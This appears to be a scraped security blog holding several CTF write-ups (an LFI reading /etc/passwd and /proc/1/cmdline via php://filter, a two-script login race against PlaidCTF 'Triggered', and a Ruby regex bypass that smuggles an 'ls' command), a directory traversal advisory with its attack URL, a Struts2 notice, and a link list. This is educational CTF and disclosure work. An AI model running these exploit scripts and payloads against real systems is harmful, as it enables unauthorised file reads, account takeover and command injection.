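    if "base-uri" not in policy:
        findings.append("base-uri missing: an injected <base href> redirects relative "
                        "script URLs (a nonce does not prevent this)")
    if "object-src" not in policy and "default-src" not in policy:
        findings.append("object-src missing: plugin content can execute script")
    for src in script:
        if src in ("'unsafe-inline'", "'unsafe-eval'"):
            findings.append(f"script-src allows {src}")
            continue
        if src.startswith("'") or src.endswith(":"):
            continue  # keyword (nonce/hash/self) or scheme source
        host = host_of(src)
        if host == "*" or host.startswith("*."):
            findings.append(f"script-src allows wildcard host {src}: any matching host can serve script")
        for jsonp in JSONP_HOSTS:
            if host_matches(host, jsonp):
                findings.append(f"script-src allows {src}, which covers the JSONP endpoint host {jsonp}")
    return findings


if __name__ == "__main__":
    for name, header in [("nonce-only", NONCE_POLICY), ("wildcard", WILDCARD_POLICY),
                         ("hardened", HARDENED_POLICY)]:
        print(f"[{name}] {header}")
        for finding in lint_csp(header) or ["no findings"]:
            print("   -", finding)
```

Running it prints the base-uri and object-src gaps for the first header, the wildcard and JSONP findings on top of those for the second, and nothing for the hardened policy.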
</div>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-21449518576382774312020-01-07T01:19:00.002+08:002020-01-07T01:27:28.099+08:00WhiteHat Grand Prix 06 – Quals, CTF writeup, Web Security 1<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHDDHVHxPbKTIWQyHeAGErRzx8-Vzdclg9lZNNaBCNwo_pMQSolJ-FQSzlwF_d7b8nZ6KFucCI3rU6kOLDZHsVa006NWZ2ZlZTflcIXVgjAH8lu3xd7sq7o94L_qljewOrS08Rvyr-mFY/s1600/Screenshot+2020-01-07+at+12.38.51+AM.png"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHDDHVHxPbKTIWQyHeAGErRzx8-Vzdclg9lZNNaBCNwo_pMQSolJ-FQSzlwF_d7b8nZ6KFucCI3rU6kOLDZHsVa006NWZ2ZlZTflcIXVgjAH8lu3xd7sq7o94L_qljewOrS08Rvyr-mFY/s640/Screenshot+2020-01-07+at+12.38.51+AM.png" width="640" /></a><br />
<br />
<br />
In this task I got a website with register, login and logout forms. The site redirected to:<br />
<br />
<ul>
<li>http://15.165.80.50/?page=login </li>
<li>http://15.165.80.50/?page=logout </li>
</ul>
<br />
After a while I figured out that the <span style="color: blue;"><i>page</i></span> parameter was <i>vulnerable</i> to local file inclusion (LFI), and with the php://filter wrapper I was able to read local files as base64. For example:<br />
<br />
<ul>
<li>http://15.165.80.50/?page=<span style="color: blue;">php://filter/convert.base64-encode/resource=/etc/passwd </span></li>
</ul>
<br />
I used the same technique to read the website's own files such as index.php, but that did not work, and I wasted time guessing the paths and file names of the web files and the flag.<br />
<br />
I then read files under <i><span style="color: blue;">/proc</span></i> and other directories to gather information. The flag turned out to be in <i><span style="color: blue;">/proc/1/cmdline</span></i>, the command line of PID 1.<br />
<div>
<br /></div>
<div>
$ curl http://15.165.80.50/?page=php://filter/convert.base64-encode/resource=/proc/1/cmdline -o a.txt</div>
<div>
$ cat a.txt</div>
<div>
<br />
<!DOCTYPE html><br />
<html lang="en"><br />
<head><br />
<title>My Viet Nam</title><br />
<meta charset="utf-8"><br />
<meta name="viewport" content="width=device-width, initial-scale=1"><br />
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css"><br />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><br />
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script><br />
<style type="text/css"><br />
body{ font: 14px sans-serif; }<br />
.wrapper{ width: 350px; padding: 20px; }<br />
</style><br />
</head><br />
<body><br />
<br />
<nav class="navbar navbar-inverse"><br />
<div class="container-fluid"><br />
<div class="navbar-header"><br />
<a class="navbar-brand" href="/">My Viet Nam</a><br />
</div><br />
<br />
<ul class="nav navbar-nav"><br />
<li class="active"><a href="/">Home</a></li><br />
</ul><br />
<ul class="nav navbar-nav navbar-right"><br />
<li><a href="?page=register"><span class="glyphicon glyphicon-user"></span> Register</a></li><br />
<ll><a href="?page=login"><span class="glyphicon glyphicon-log-in"></span> Login</a></li><br />
</ul><br />
</div><br />
</nav>/bin/bash/bin/start_service WhiteHat{Local_File_Inclusion_bad_enough_??}<br />
<br />
The flag was <span style="color: blue;">WhiteHat{Local_File_Inclusion_bad_enough_??}.</span><br />
</div>
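As an added example that is not part of the original writeup, here is the post-processing step for the php://filter trick used above. The wrapper returns the target file base64-encoded, embedded inside the site's normal HTML at the include point, so the script extracts the blob, decodes it, and splits /proc/<pid>/cmdline on its NUL separators (which is why the raw output above reads as one run-together string). The sample page below is constructed from a trimmed copy of the site's template and a cmdline like the one found in the writeup; the host comes from the writeup.

```python
import base64
import binascii
import re

# Added example (not from the original writeup): decode what
# ?page=php://filter/convert.base64-encode/resource=... returns.

BASE = "http://15.165.80.50/"  # challenge host from the writeup


def lfi_url(path: str, base: str = BASE) -> str:
    """Build the php://filter read URL for an absolute path on the target."""
    return f"{base}?page=php://filter/convert.base64-encode/resource={path}"


def extract_base64_payload(page_html: str) -> bytes:
    """Return the decoded bytes of the longest base64-looking run in the page.
    Good enough here because the template contains no long base64 runs; against
    a real target, anchor on the markup around the include point instead."""
    candidates = sorted(re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", page_html),
                        key=len, reverse=True)
    for blob in candidates:
        try:
            return base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except (ValueError, binascii.Error):
            continue
    raise ValueError("no base64 payload found in response")


def parse_cmdline(raw: bytes) -> list:
    """/proc/<pid>/cmdline stores argv NUL-separated and NUL-terminated."""
    return [arg.decode(errors="replace") for arg in raw.split(b"\x00") if arg]


# Constructed sample: a trimmed copy of the site's template with the base64 of a
# cmdline like the one in the writeup appended where the include happens.
SAMPLE_CMDLINE = b"/bin/bash\x00/bin/start_service\x00WhiteHat{Local_File_Inclusion_bad_enough_??}\x00"
SAMPLE_PAGE = (
    '<!DOCTYPE html><html lang="en"><head><title>My Viet Nam</title>'
    '<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>'
    '</head><body><nav class="navbar navbar-inverse">'
    '<a class="navbar-brand" href="/">My Viet Nam</a></nav>'
    + base64.b64encode(SAMPLE_CMDLINE).decode()
    + "</body></html>"
)

if __name__ == "__main__":
    print(lfi_url("/proc/1/cmdline"))
    print(parse_cmdline(extract_base64_payload(SAMPLE_PAGE)))
```

Against the real target you would fetch lfi_url("/proc/1/cmdline") and feed the response body to extract_base64_payload(); the split argv makes it obvious that the flag was passed as a separate argument to the start script.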
<div>
<br /></div>
Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com2tag:blogger.com,1999:blog-4385614092107866208.post-33599018134289851972019-04-15T17:00:00.000+08:002020-01-07T01:57:41.686+08:00PlaidCTF 2019 - Triggered (Web)I was not able to solve this problem during the contest. Someone posted a hint on Twitter (<a href="https://twitter.com/gP4yload/status/1117607002354540544" target="_blank">Link#</a>); I solved it following his post, but it did not include the details, so I wrote the code below and found the flag: <br />
<br />
<u>Problem Description</u><br />
<br />
Triggered - Web (280 pts)<br />
<br />
I stared into the abyss of microservices, and it stared back. I found something utterly terrifying about the chaos of connections. <br />
<br />
"Screw this," I finally declared, "why have multiple services when the database can do everything just fine on its own?" <br />
<br />
And so on that glorious day it came to be that everything ran in <a href="http://triggered.pwni.ng:52856/">plpgsql</a>.<br />
<br />
<u>Write up</u><br />
<br />
The two scripts below must run at the same time, because the exploit is a race condition: the first keeps searching as a normal user, the second keeps re-submitting the admin username against the same session.<br />
<br />
First Code: <br />
<pre style="background: #f0f0f0; border: 1px dashed #cccccc; color: black; font-family: "arial"; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">import requests


def request_post(url, cookies, data):
    r = requests.post(url, cookies=cookies, data=data)
    # The search page greets the admin; that is the sign the race was won.
    if r.url == "http://triggered.pwni.ng:52856/search":
        if "Hey there, admin" in r.text:
            print(r.text)
            print("[-] Result: Found out!")
            exit()
    return r


def signin():
    # Two-step login: username first, then password, both bound to the session cookie.
    data = {'username': 'searchtheflag'}
    url = "http://triggered.pwni.ng:52856/login"
    request_post(url, cookies, data)
    data = {'password': 'test'}
    url = "http://triggered.pwni.ng:52856/login/password"
    request_post(url, cookies, data)
    print("[-] Sign-in: Okay")


if __name__ == "__main__":
    cookies = {
        'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b"  # your session
    }
    signin()
    while True:
        # search for the flag
        data = {'query': 'flag'}
        url = "http://triggered.pwni.ng:52856/search"
        r = request_post(url, cookies, data)
        print("[-] Search: in progress")
        # The admin-login loop in the second script resets the session; log in again.
        if r.url == "http://triggered.pwni.ng:52856/login":
            signin()

</code></pre>
<br />
Second Code:<br />
<pre style="background: #f0f0f0; border: 1px dashed #cccccc; color: black; font-family: "arial"; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">import requests

BASE = "http://triggered.pwni.ng:52856"


def request_post(url, cookies, data):
    return requests.post(url, cookies=cookies, data=data)


def signin_admin(cookies):
    # Re-send only the username step as "admin" on the shared session,
    # racing the password step performed by the first script.
    data = {'username': 'admin'}
    request_post(BASE + "/login", cookies, data)


if __name__ == "__main__":
    cookies = {
        'session': "5f129555-dafb-4feb-b1c6-472d260a8d3b"  # your session
    }
    while True:
        signin_admin(cookies)
</code></pre>
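A model of the two-step login race the two scripts above exploit, added here as an example; it is not part of the original writeup and not the challenge's plpgsql code, whose real logic the post does not show. The model therefore rests on an assumption: /login stores the username in the session, and /login/password checks the password for the stored username and then marks the session authenticated. The `USERS` table, the `Session` class and the `between_check_and_commit` hook (which stands in for the second script's concurrent /login request) are all constructed for the example. The vulnerable step is shown beside a hardened one that commits only the identity it actually verified.

```python
import threading

# Constructed user table (not the challenge's data): the low-privilege
# account's password is known, the admin's is not.
USERS = {"admin": "<unknown-admin-password>", "searchtheflag": "test"}


class Session:
    """Server-side state behind one session cookie (assumed layout)."""
    def __init__(self):
        self.username = None        # set by the /login step
        self.authenticated = False  # set by the /login/password step
        self.lock = threading.Lock()


def login_username(session, username):
    """Step 1 (/login): record which account is signing in."""
    with session.lock:
        session.username = username
        session.authenticated = False


def login_password_vulnerable(session, password, between_check_and_commit=lambda: None):
    """Step 2 (/login/password) with a time-of-check/time-of-use bug: the
    password is checked against session.username, but the commit trusts
    whatever session.username holds when it runs."""
    if USERS.get(session.username) != password:
        return False
    between_check_and_commit()   # a concurrent /login request lands here
    session.authenticated = True
    return True


def login_password_hardened(session, password, between_check_and_commit=lambda: None):
    """Same step, fixed: capture the identity once, check the password for
    that identity, and commit with a compare-and-set that fails if the
    session changed in between."""
    username = session.username
    if USERS.get(username) != password:
        return False
    between_check_and_commit()
    with session.lock:
        if session.username != username:
            return False          # identity was swapped; refuse to commit
        session.authenticated = True
    return True


def simulate_login(step2, race=True):
    """Drive one login as 'searchtheflag' with the given step-2 handler. With
    race=True a concurrent /login as 'admin' is injected between check and
    commit, which is what the second script above does in a loop.
    Returns (step-2 result, user the session is now authenticated as)."""
    s = Session()
    login_username(s, "searchtheflag")
    injected = (lambda: login_username(s, "admin")) if race else (lambda: None)
    ok = step2(s, "test", between_check_and_commit=injected)
    return ok, (s.username if s.authenticated else None)


if __name__ == "__main__":
    print("vulnerable, raced :", simulate_login(login_password_vulnerable))
    print("hardened, raced   :", simulate_login(login_password_hardened))
    print("hardened, no race :", simulate_login(login_password_hardened, race=False))
```

The simplest fix is to take username and password in a single request so there is no pending identity to swap; where the two-step flow must stay, the compare-and-set above makes the commit refuse an identity it did not verify. In a PostgreSQL-backed implementation the equivalent is to do the check and the commit in one transaction with the session row locked (`SELECT ... FOR UPDATE`).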
<br />
Result & Flag:<br />
<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #cccccc; color: black; font-family: "arial"; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">[-] Sign-in: Okay
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
[-] Search: in progress
[-] Sign-in: Okay
<html>
<head>
<link rel="stylesheet" href="/static/styles.css" />
<link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,400i,700,700i,900,900i" rel="stylesheet">
</head>
<body>
<header>
<a href="/" class="left">
<h1>pgNotes</h1>
<h2>Let's keep it PG, ok?</h2>
</a>
<div class="right">

<nav>
<div class="welcome">Hey there, admin</div>
&middot;
<a href="/search">Search notes</a>
&middot;
<a href="/note/new">New note</a>
&middot;
<a href="/logout">Logout</a>
</nav>

</div>
</header>
<main>
<section class="search-input">
<h3>Search</h3>
<form method="POST" action="/search">
<div class="input">
<label>Query</label>
<input type="text" name="query" />
</div>
<div class="input submit">
<input type="submit" />
</div>
</form>
</section>

<section class="search-query">
Results for <span class="query">flag</span>
</section>


<section class="note">
<section class="header">
<h4>Flag</h4>
<div class="author">admin</div>
<div class="date">02:44pm on April 13, 2019</div>
</section>
<section class="content">
<p>
PCTF{i_rAt3_p0sTgRE5_1O_oUT_0f_14_pH_n3ed5_m0Re_4Cid}
</p>
</section>
</section>

<section class="note">
<section class="header">
<h4>flag</h4>
<div class="author">admin</div>
<div class="date">08:11am on April 14, 2019</div>
</section>
<section class="content">
<p>
PCTF{cr4zy_70_m4k3_w3b_4ppl1c4710n_w17h_plp65ql}
</p>
</section>
</section>

<section class="note">
<section class="header">
<h4>flag</h4>
<div class="author">admin</div>
<div class="date">04:51pm on April 14, 2019</div>
</section>
<section class="content">
<p>
PCTF{PsQl_w3bs3rv3rf0rh1pst3r_l0l}
</p>
</section>
</section>

<section class="note">
<section class="header">
<h4>Flag</h4>
<div class="author">admin</div>
<div class="date">06:55pm on April 14, 2019</div>
</section>
<section class="content">
<p>
PCTF{pGn0Te2_Lets_k22P_1t_PG_oK}
</p>
</section>
</section>



</main>
</body>
</html>
[-] Result: Found out!
</code></pre>
<br />
Thanks
<a href="https://twitter.com/gP4yload" target="_blank">@gP4yload</a><br />
<br />
Posted by Kerz, 2017-03-07<br />
<b>Apache Struts2 (cve-2017-5638)</b><br />
<span style="font-family: Verdana, sans-serif;">Be careful: there is a new vulnerability in Apache Struts2 (CVE-2017-5638).</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">How to Fix: upgrade to Struts 2.3.32 or Struts 2.5.10.1<br />Affected Versions: Struts 2.3.5 - 2.3.31, Struts 2.5 - 2.5.10</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">POC: </span><br />
<span style="font-family: Verdana, sans-serif;"><a href="https://github.com/tengzhangchao/Struts2_045-Poc">https://github.com/tengzhangchao/Struts2_045-Poc</a> </span><br />
<br />
Posted by Kerz, 2016-06-09<br />
<b>RESPONSIVE filemanager <= 9.10.2 - Directory Traversal</b><br />
<span style="font-size: small;">Advisory: Directory Traversal in RESPONSIVE filemanager on Windows Server<br />
<br />
During a penetration test I discovered a directory traversal vulnerability<br />
in RESPONSIVE filemanager. Attackers are able to read arbitrary directories by specifying a<br />
relative path.<br />
<br />
Details<br />
=======<br />
<br />
Product: RESPONSIVE filemanager<br />
Affected Versions: RESPONSIVE filemanager v9.10.2<br />
Fixed Versions: Not yet<br />
Vulnerability Type: Directory Traversal<br />
Vendor URL:<br />
 http://www.responsivefilemanager.com/<br />
Software Link:<br />
 https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.10.2/responsive_filemanager.zip<br />
Vendor Status: fixed version released<br />
Advisory URL: http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html<br />
Tested on: Windows Server<br />
CVE: CVE-2014-2575<br />
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575<br />
<br />
Attack Detail<br />
[URL]/filemanager/dialog.php?editor=tinymce&type=&lang=&popup=0&field_id=&relative_url=0&akey=key&fldr=..\<br />
fldr=..\..\..\</span><br />
<br />
Posted by Kerz, 2016-03-14<br />
<b>CODEGATE 2016: JS_is_not_a_jail</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3mhLEjKyhD8puh_YbFr0CyQbw2MO4WIDulYXBSEsCQoyio25GtlRhhgv9_D401Z_2ZVcfFsRBALl1eLEIAdc1lb9xq9u6pg0-0JbJvO8oxQRxARDvGfB4V7T1Bg0DwIEBXKN15BX9RNI/s1600/Image.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3mhLEjKyhD8puh_YbFr0CyQbw2MO4WIDulYXBSEsCQoyio25GtlRhhgv9_D401Z_2ZVcfFsRBALl1eLEIAdc1lb9xq9u6pg0-0JbJvO8oxQRxARDvGfB4V7T1Bg0DwIEBXKN15BX9RNI/s1600/Image.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: start;">JS_is_not_a_jail</span><br style="text-align: start;" /><span style="text-align: start;">nc 175.119.158.131 1129</span></div>
<br />
After connecting to the server, I tried the "quit()" command.<br />
It raised an error that revealed the file path "/home/codegate/cg.js".<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRxKfGeb_k59aVMb-TR9W2df1nQhWiYep-AWWunF-npW6F4l5UOy4X_Yw4KB0YeNeAs8Ri81vRIG2gTFUGdP9jugHXFpVHBg_wria9lmwcMQOEUNTeCIU9uJz9N3dM0mljCeN553nZJu8/s1600/Image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRxKfGeb_k59aVMb-TR9W2df1nQhWiYep-AWWunF-npW6F4l5UOy4X_Yw4KB0YeNeAs8Ri81vRIG2gTFUGdP9jugHXFpVHBg_wria9lmwcMQOEUNTeCIU9uJz9N3dM0mljCeN553nZJu8/s1600/Image2.png" /></a></div>
<br />
I can use the read() function to read the code.<br />
<br />
read('/home/codegate/cg.js')<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8CP9rTrZUDxAkeWAbkVMm1MyBoHRpb9eEB1QAqUVomvPnx_ZZ7YDhf4gwcNd-nvn87da25rU8KJHcrh3Hil30SE0aDIPeFuPVh6E1t_1Rk040i9ZU0UJOtVrJMkkB_KGV3iMCdJqjYZM/s1600/Image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8CP9rTrZUDxAkeWAbkVMm1MyBoHRpb9eEB1QAqUVomvPnx_ZZ7YDhf4gwcNd-nvn87da25rU8KJHcrh3Hil30SE0aDIPeFuPVh6E1t_1Rk040i9ZU0UJOtVrJMkkB_KGV3iMCdJqjYZM/s1600/Image3.png" /></a></div>
<br />
FLAG:<br />
easy xD, get a harder challenge!<br />
<div>
<br /></div>
<br />
Posted by Kerz, 2016-02-22<br />
<b>Internetwache 2016 EXP50 Writeup</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ01li-cjsYkkSDkKNOuMrCO-L6HLtmqrCMWqN9jJ64TmkS4lBpvPJjHehwCVjEmNs21NIOGOgGHzUdeeLzLQuJujm1fZd7xz3pG3dYjhOEEefS8r78JiPvNiSfnbBa1wq6ZkthznqT1c/s1600/exp50_1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZ01li-cjsYkkSDkKNOuMrCO-L6HLtmqrCMWqN9jJ64TmkS4lBpvPJjHehwCVjEmNs21NIOGOgGHzUdeeLzLQuJujm1fZd7xz3pG3dYjhOEEefS8r78JiPvNiSfnbBa1wq6ZkthznqT1c/s640/exp50_1.jpg" width="640" /></a></div>
<br />
<br />
When I accessed the server at 188.166.133.53:12037,<br />
it showed <span style="color: blue;">"Let me count the ascii values of 10 characters:"</span>.<br />
I just entered some text such as <span style="color: blue;">"test"</span>, and it showed the error below:<br />
<span style="color: blue;">"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"</span><br />
<br />
The check relies on Ruby's regex anchors: in Ruby, ^ and $ match at line boundaries rather than at the start and end of the whole string, so a value containing a newline can pass /^[a-f]{10}$/ while still carrying other data on another line. I wrote the following code to get the flag.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #cccccc; color: black; font-family: "arial"; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('188.166.133.53', 12037))
print(s.recv(1024).decode())
print(s.recv(1024).decode())
# The second line "aaaaaaaaaa" satisfies /^[a-f]{10}$/ because Ruby's ^ and $
# are line anchors, so the whole two-line payload is accepted.
s.send(b'ls\naaaaaaaaaa')
print(s.recv(1024).decode())
s.close()
</code></pre>
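To make the anchor behaviour concrete, here is an added example (not from the original writeup) that reproduces the server's check in Python. Ruby's line-anchored ^ and $ are emulated with `re.MULTILINE`; `strict_accepts` is the check the server should have used; and `ascii_sum` shows why the server reported 1203 for the payload: it summed every character it received, including the "ls" and the newline, even though only the second line had been validated. The function names are mine.

```python
import re

PATTERN = r"^[a-f]{10}$"


def ruby_style_accepts(value, pattern=PATTERN):
    """Mimic Ruby's anchors: ^ and $ always match at line boundaries, so the
    pattern only has to match one line somewhere inside the value."""
    return re.search(pattern, value, re.MULTILINE) is not None


def python_match_accepts(value, pattern=PATTERN):
    """Python's default anchors are closer to what was intended, but $ still
    matches before a single trailing newline, so re.match is not enough."""
    return re.match(pattern, value) is not None


def strict_accepts(value, pattern=PATTERN):
    r"""The check the server should have done: the whole value, start to end,
    must match (in Ruby spelling, /\A[a-f]{10}\z/)."""
    return re.fullmatch(pattern, value) is not None


def ascii_sum(value):
    """What the server did after validation: add up the code point of every
    character it received, newline and all."""
    return sum(ord(ch) for ch in value)


if __name__ == "__main__":
    payload = "ls\naaaaaaaaaa"          # the payload sent by the script above
    print("ruby-style accepts :", ruby_style_accepts(payload))
    print("strict accepts     :", strict_accepts(payload))
    print("ascii sum          :", ascii_sum(payload))
```

The practical rule for Ruby code: anchor whole-string validations with \A and \z, never ^ and $. Python has the same trap in a milder form (the trailing-newline case shown by `python_match_accepts`), which `re.fullmatch` avoids.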
<br />
Then, the server returns as below:<br />
<br />
<span style="color: blue;">$ python test.py</span><br />
<span style="color: blue;">Let me count the ascii values of 10 characters:</span><br />
<span style="color: blue;"><br /></span>
<span style="color: blue;"><br /></span>
<span style="color: blue;">Sum is: 1203</span><br />
<span style="color: blue;">IW{RUBY_R3G3X_F41L}</span><br />
<div>
<br /></div>
<br />
FLAG:<br />
<span style="color: blue;">IW{RUBY_R3G3X_F41L}</span><br />
<br />
Reference:<br />
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html<br />
<br />
Posted by Kerz, 2016-01-13<br />
<b>List of all the security conferences in 2015 (or older)</b><br />
Reference: <a href="https://www.reddit.com/r/netsec/comments/40i06f/i_put_together_a_list_of_all_the_security/">https://www.reddit.com/r/netsec/comments/40i06f/i_put_together_a_list_of_all_the_security/</a><br />
<br />
1. Security Conferences from 2015<br />
<a href="https://www.tunnelsup.com/online-security-conferences/">https://www.tunnelsup.com/online-security-conferences/</a><br />
<br />
2. NorthSec, Montreal, Canada<br />
<a href="https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh">https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh</a><br />
<br />
3. 32C3<br />
<a href="https://www.youtube.com/playlist?list=PL_IxoDz1Nq2YahR4DU9q5GWsSTle-mETW">https://www.youtube.com/playlist?list=PL_IxoDz1Nq2YahR4DU9q5GWsSTle-mETW</a><br />
<br />
4. PS4 Booting and running Linux<br />
<a href="https://www.youtube.com/watch?v=PQFNnr6Ly9M">https://www.youtube.com/watch?v=PQFNnr6Ly9M</a><br />
<br />
5. Metcalf - Modern Active Directory Attacks (Blackhat usa 2015)<br />
<a href="https://www.youtube.com/watch?v=b6GUXerE9Ac&list=PLH15HpR5qRsXF78lrpWP2JKpPJs_AFnD7&index=42">https://www.youtube.com/watch?v=b6GUXerE9Ac&list=PLH15HpR5qRsXF78lrpWP2JKpPJs_AFnD7&index=42</a><br />
<br />
6. Rob Fuller - Basic Security<br />
<a href="https://www.youtube.com/watch?v=TqbGNFfl1d8">https://www.youtube.com/watch?v=TqbGNFfl1d8</a><br />
<br />
7. SteelCon (Sheffield, UK, July 3-5 2015)<br />
<a href="https://www.youtube.com/playlist?list=PLmfJypsykTLX9mDeChQ7fovybwYzQgr6j">https://www.youtube.com/playlist?list=PLmfJypsykTLX9mDeChQ7fovybwYzQgr6j</a><br />
<br />
8. ekoparty 2015<br />
<a href="https://vimeo.com/album/3682874">https://vimeo.com/album/3682874</a><br />
<br />
9. OWASP AppSec EU and CA<br />
<a href="https://www.youtube.com/playlist?list=PLpr-xdpM8wG93dG_L9QKs0W1cD-esQEzU">https://www.youtube.com/playlist?list=PLpr-xdpM8wG93dG_L9QKs0W1cD-esQEzU</a><br />
<br />
10. Crypto 2015<br />
<a href="https://m.youtube.com/playlist?list=PLeeS-3Ml-rpoNWewUnljPP7QN4USn4c7H">https://m.youtube.com/playlist?list=PLeeS-3Ml-rpoNWewUnljPP7QN4USn4c7H</a><br />
<a href="http://www.iacr.org/conferences/crypto2015/">http://www.iacr.org/conferences/crypto2015/</a><br />
<br />
11. BSides Orlando (- April 11 – 12, 2015 -)<br />
<a href="https://www.youtube.com/playlist?list=PLu1bAtIWt2VbXiy4kNWdtVkWiRWvPoeD6">https://www.youtube.com/playlist?list=PLu1bAtIWt2VbXiy4kNWdtVkWiRWvPoeD6</a><br />
<br />
12. BruCON as well (26-27 October)<br />
<a href="https://www.youtube.com/user/brucontalks">https://www.youtube.com/user/brucontalks</a><br />
<br />
13. USENIX Security '15<br />
<a href="https://www.youtube.com/playlist?list=PLbRoZ5Rrl5lfeRixThHzgGYj1wu80JOh3">https://www.youtube.com/playlist?list=PLbRoZ5Rrl5lfeRixThHzgGYj1wu80JOh3</a><br />
<br />
14. Brucon (Belgium)<br />
<a href="https://www.youtube.com/playlist?list=PLtb1FJdVWjUfZ9fWxPPCrOO7LUquB3WrB">https://www.youtube.com/playlist?list=PLtb1FJdVWjUfZ9fWxPPCrOO7LUquB3WrB</a><br />
<br />
15. CERT.pl's Secure 2015<br />
<a href="https://www.youtube.com/playlist?list=PLghf5UNZbzG0zLarfwpw4PxPTS0IWo8vB">https://www.youtube.com/playlist?list=PLghf5UNZbzG0zLarfwpw4PxPTS0IWo8vB</a><br />
<br />
16. CornCon<br />
<a href="https://www.youtube.com/channel/UCP2fm3Wg8LacmD96N7CkOBA/videos?sort=dd&view=0&shelf_id=0">https://www.youtube.com/channel/UCP2fm3Wg8LacmD96N7CkOBA/videos?sort=dd&view=0&shelf_id=0</a><br />
<br />
17. BSides Charleston<br />
<a href="https://www.youtube.com/user/bsideschs/videos">https://www.youtube.com/user/bsideschs/videos</a><br />
<br />
18. SaintCON 2015 at Weber State University in Ogden UT<br />
<a href="https://www.youtube.com/channel/UCEiHGeWgdIoLCzTLm_izCoQ">https://www.youtube.com/channel/UCEiHGeWgdIoLCzTLm_izCoQ</a><br />
<br />
19. BSidesSLC that will be in Salt Lake City 2016<br />
<a href="https://www.youtube.com/channel/UCuJ0qrx-oNq2hxrUX5IYd9A">https://www.youtube.com/channel/UCuJ0qrx-oNq2hxrUX5IYd9A</a><br />
<br />
20. syscan<br />
<a href="https://www.youtube.com/channel/UCx5hZiie0VzFvV-u376v7DQ">https://www.youtube.com/channel/UCx5hZiie0VzFvV-u376v7DQ</a><br />
<br />
21. Brocon 2015<br />
<a href="https://www.youtube.com/playlist?list=PL2EYTX8UVCMhwxWH1IklKkV64YX_0Xcoo">https://www.youtube.com/playlist?list=PL2EYTX8UVCMhwxWH1IklKkV64YX_0Xcoo</a><br />
<br />
22. CarolinaCon<br />
<a href="https://www.youtube.com/user/CarolinaConVideos/videos">https://www.youtube.com/user/CarolinaConVideos/videos</a><br />
<br />
23. Bsides Lisbon 2015<br />
